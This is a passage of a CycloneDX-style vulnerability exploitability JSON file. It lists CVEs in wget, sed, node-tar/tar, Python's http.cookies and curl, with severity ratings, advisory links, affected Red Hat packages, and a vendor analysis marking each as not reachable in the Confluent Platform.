      "description": "GNU Wget through 1.25.0, fixed in commit dd692d9, contains a heap buffer overflow vulnerability in the html_quote_string() function in src/convert.c that allows a remote attacker to trigger memory corruption by supplying a crafted HTML attribute with a large number of characters requiring entity encoding. A server-supplied HTML attribute causes a signed integer counter to overflow during output size accumulation, resulting in an undersized heap allocation and subsequent heap buffer overflow during the copy phase.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-58472"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-58472"
        },
        {
          "url": "https://github.com/advisories/GHSA-332r-8pmf-8m9p"
        },
        {
          "url": "https://gitlab.com/gnuwget/wget/-/commit/dd692d9cea5335b181d877ae917fe6e75587a812"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-58472"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8543-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-58472"
        },
        {
          "url": "https://www.vulncheck.com/advisories/gnu-wget-heap-buffer-overflow-via-html-attribute-encoding"
        }
      ],
      "published": "2026-07-07T21:17:28+00:00",
      "updated": "2026-07-09T15:58:45+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "1.21.1-8.el9_4",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-5958",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        367
      ],
      "description": "When sed is invoked with both -i (in-place edit) and --follow-symlinks, the function open_next_file() performs two separate, non-atomic filesystem operations on the same path: \n1. resolves symlink to its target and stores\u00a0the resolved path for determining when output is written,\n2. opens the original symlink path\u00a0(not the resolved one) to read the file. \nBetween these two calls there is a race window. If an attacker atomically replaces the symlink with a different target during that window, sed will: read content from the new (attacker-chosen) symlink target and write the processed result to the path recorded in step 1.\u00a0This can lead to arbitrary file overwrite with attacker-controlled content in the context of the sed process.\n\n\nThis issue was fixed in version 4.10.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-5958"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/05/13/1"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-5958"
        },
        {
          "url": "https://cert.pl/en/posts/2026/04/CVE-2026-5958"
        },
        {
          "url": "https://github.com/advisories/GHSA-9r7w-j29g-xqx8"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-5958"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8229-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8229-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-5958"
        },
        {
          "url": "https://www.gnu.org/software/sed"
        },
        {
          "url": "https://www.gnu.org/software/sed/"
        }
      ],
      "published": "2026-04-20T12:16:08+00:00",
      "updated": "2026-06-17T10:59:56+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/sed@4.8-10.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "4.8-10.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/sed@4.8-10.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/sed@4.8-10.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/sed@4.8-10.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/sed@4.8-10.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/sed@4.8-10.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/sed@4.8-10.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/sed@4.8-10.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/sed@4.8-10.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/sed@4.8-10.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/sed@4.8-10.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/sed@4.8-10.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/sed@4.8-10.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/sed@4.8-10.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/sed@4.8-10.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/sed@4.8-10.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-59871",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ghsa"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        }
      ],
      "cwes": [
        704
      ],
      "description": "node-tar is a tar archive manipulation library for Node.js. Prior to 7.5.18, node-tar coerces all-digit PAX path and linkpath values in src/pax.ts to JavaScript numbers, causing downstream path handling such as normalizeWindowsPath(entry.path).split('/') to throw an uncaught TypeError. This issue is fixed in version 7.5.18.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-59871"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-59871"
        },
        {
          "url": "https://github.com/isaacs/node-tar"
        },
        {
          "url": "https://github.com/isaacs/node-tar/commit/e02a4e9e013c4be95302e2eb2047a942b883c27b"
        },
        {
          "url": "https://github.com/isaacs/node-tar/releases/tag/v7.5.18"
        },
        {
          "url": "https://github.com/isaacs/node-tar/security/advisories/GHSA-w8wr-v893-vjvp"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59871"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-59871"
        }
      ],
      "published": "2026-07-08T16:16:33+00:00",
      "updated": "2026-07-10T19:02:55+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2",
          "versions": [
            {
              "version": "2:1.34-11.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-59875",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ghsa"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        }
      ],
      "cwes": [
        248
      ],
      "description": "node-tar is a tar archive manipulation library for Node.js. Prior to 7.5.17, node-tar does not strip NUL bytes from PAX path and linkpath records in src/pax.ts, allowing a crafted archive with values to reach fs.lstat or fs.open and terminate the process with an uncaught exception. This issue is fixed in version 7.5.17.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-59875"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-59875"
        },
        {
          "url": "https://github.com/isaacs/node-tar"
        },
        {
          "url": "https://github.com/isaacs/node-tar/commit/7a635c29f5edbf083557374d43984273ecfed5b3"
        },
        {
          "url": "https://github.com/isaacs/node-tar/releases/tag/v7.5.17"
        },
        {
          "url": "https://github.com/isaacs/node-tar/security/advisories/GHSA-gvwx-54wh-qm9j"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59875"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-59875"
        }
      ],
      "published": "2026-07-08T16:16:34+00:00",
      "updated": "2026-07-10T19:10:59+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2",
          "versions": [
            {
              "version": "2:1.34-11.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-6019",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.1,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.8,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        150,
        116
      ],
      "description": "http.cookies.Morsel.js_output() returns an inline <script> snippet and only escapes \" for JavaScript string context. It does not neutralize the HTML parser-sensitive sequence </script> inside the generated script element. Mitigation base64-encodes the cookie value to disallow escaping using cookie value.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-6019"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:28247"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:28581"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-6019"
        },
        {
          "url": "https://bugzilla.redhat.com/2458049"
        },
        {
          "url": "https://bugzilla.redhat.com/2460869"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2458049"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460869"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4786"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-6019"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-28247.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:28581"
        },
        {
          "url": "https://github.com/python/cpython/commit/3c59b8b53fc75c7f9578d16fb8201ceb43e8f76c"
        },
        {
          "url": "https://github.com/python/cpython/commit/76b3923d688c0efc580658476c5f525ec8735104"
        },
        {
          "url": "https://github.com/python/cpython/commit/f795e042043dfe26c42e1971d4502c1cdc4c65b8"
        },
        {
          "url": "https://github.com/python/cpython/issues/90309"
        },
        {
          "url": "https://github.com/python/cpython/pull/148848"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-6019.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-28581.html"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/IVNWGV2BBNC3RHQAFS22UP4DY56SAXX3/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6019"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8509-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-6019"
        }
      ],
      "published": "2026-04-22T20:16:42+00:00",
      "updated": "2026-07-27T17:34:54+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-6253",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        522
      ],
      "description": "curl might erroneously pass on credentials for a first proxy to a second\nproxy.\n\nThis can happen when the following conditions are true:\n\n1. curl is setup to use specific different proxies for different URL schemes\n2. the first proxy needs credentials\n3. the second proxy uses no credentials\n4. while using the first proxy (using say `http://`), curl is asked to follow\n   a redirect to a URL using another scheme (say `https://`), accessed using a\n   second, different, proxy",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-6253"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/04/29/11"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-6253"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-6253.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-6253.json"
        },
        {
          "url": "https://hackerone.com/reports/3669637"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6253"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8227-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-6253"
        }
      ],
      "published": "2026-05-13T13:01:56+00:00",
      "updated": "2026-06-17T11:00:33+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
